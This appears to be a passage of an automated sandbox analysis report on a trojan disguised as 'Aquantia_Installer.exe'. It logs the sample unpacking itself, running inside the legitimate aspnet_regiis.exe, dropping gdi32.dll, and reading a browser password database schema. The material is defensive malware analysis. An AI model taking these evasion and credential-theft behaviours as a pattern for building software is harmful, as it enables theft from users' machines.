Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7B8A0	3_2_02F7B8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7D0AF	3_2_02F7D0AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F88890	3_2_02F88890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F86848	3_2_02F86848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6A043	3_2_02F6A043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F69848	3_2_02F69848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F78816	3_2_02F78816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F68810	3_2_02F68810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F8780C	3_2_02F8780C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F551F0	3_2_02F551F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F711F0	3_2_02F711F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F549BF	3_2_02F549BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F739A0	3_2_02F739A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F861A0	3_2_02F861A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F56980	3_2_02F56980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F90170	3_2_02F90170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F70140	3_2_02F70140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F57920	3_2_02F57920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F75110	3_2_02F75110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F80105	3_2_02F80105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F53EF0	3_2_02F53EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6FEC0	3_2_02F6FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F906A0	3_2_02F906A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F77E93	3_2_02F77E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F78E53	3_2_02F78E53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6C658	3_2_02F6C658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F88630	3_2_02F88630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7CDBA	3_2_02F7CDBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6E615	3_2_02F6E615
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F56E10	3_2_02F56E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F76E10	3_2_02F76E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7CE0D	3_2_02F7CE0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F5AFF0	3_2_02F5AFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F597C0	3_2_02F597C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6CFC0	3_2_02F6CFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F8FF90	3_2_02F8FF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F82F50	3_2_02F82F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F91750	3_2_02F91750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6D700	3_2_02F6D700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F534F0	3_2_02F534F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F55CE0	3_2_02F55CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F804DB	3_2_02F804DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F5B4D2	3_2_02F5B4D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F814D0	3_2_02F814D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7A4B0	3_2_02F7A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6F480	3_2_02F6F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6CC80	3_2_02F6CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F6EC40	3_2_02F6EC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F78430	3_2_02F78430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F77C20	3_2_02F77C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F89DD9	3_2_02F89DD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F7E596	3_2_02F7E596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F8FD90	3_2_02F8FD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02F72510	3_2_02F72510

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02F68800 appears 64 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02F584E0 appears 46 times

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224

Source: Aquantia_Installer.exe, 00000000.00000000.2009798765.000000000108E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBenjaminFelixLiam.dYZeT vs Aquantia_Installer.exe
Source: Aquantia_Installer.exe, 00000000.00000002.2351578827.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Aquantia_Installer.exe
Source: Aquantia_Installer.exe	Binary or memory string: OriginalFilenameBenjaminFelixLiam.dYZeT vs Aquantia_Installer.exe

Source: Aquantia_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Aquantia_Installer.exe

Static PE information: Section: 4mh:* ZLIB complexity 1.0003170543721973

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@2/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02F89160 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_02F89160

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3716
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0932aab7-42f5-4f68-96fc-3ffa2ee5357c

Jump to behavior

Source: Aquantia_Installer.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000003.00000003.2068475032.0000000005707000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068862830.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2089960755.0000000005702000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Aquantia_Installer.exe	String found in binary or memory: -addpset
Source: Aquantia_Installer.exe	String found in binary or memory: -addfulltrust
Source: Aquantia_Installer.exe	String found in binary or memory: -addgroup
Source: Aquantia_Installer.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

File read: C:\Users\user\Desktop\Aquantia_Installer.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Aquantia_Installer.exe "C:\Users\user\Desktop\Aquantia_Installer.exe"
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Aquantia_Installer.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Aquantia_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb ty source: Aquantia_Installer.exe, 00000000.00000002.2351578827.000000000181B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\Aquantia_Installer.PDB source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER1023.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdbo source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb6 source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1023.tmp.dmp.6.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351199241.00000000014F9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: Aquantia_Installer.exe, 00000000.00000002.2351578827.00000000017CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbD`aq source: WER1023.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER1023.tmp.dmp.6.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

Unpacked PE file: 0.2.Aquantia_Installer.exe.fe0000.0.unpack 4mh:*:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: Aquantia_Installer.exe	Static PE information: section name: 4mh:*
Source: Aquantia_Installer.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_00FE26FE push ecx; retf		0_2_00FE277A
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Code function: 0_2_00FE4824 push esp; iretd		0_2_00FE4847

Source: Aquantia_Installer.exe

Static PE information: section name: 4mh:* entropy: 7.99971930966257

Source: C:\Users\user\Desktop\Aquantia_Installer.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Aquantia_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
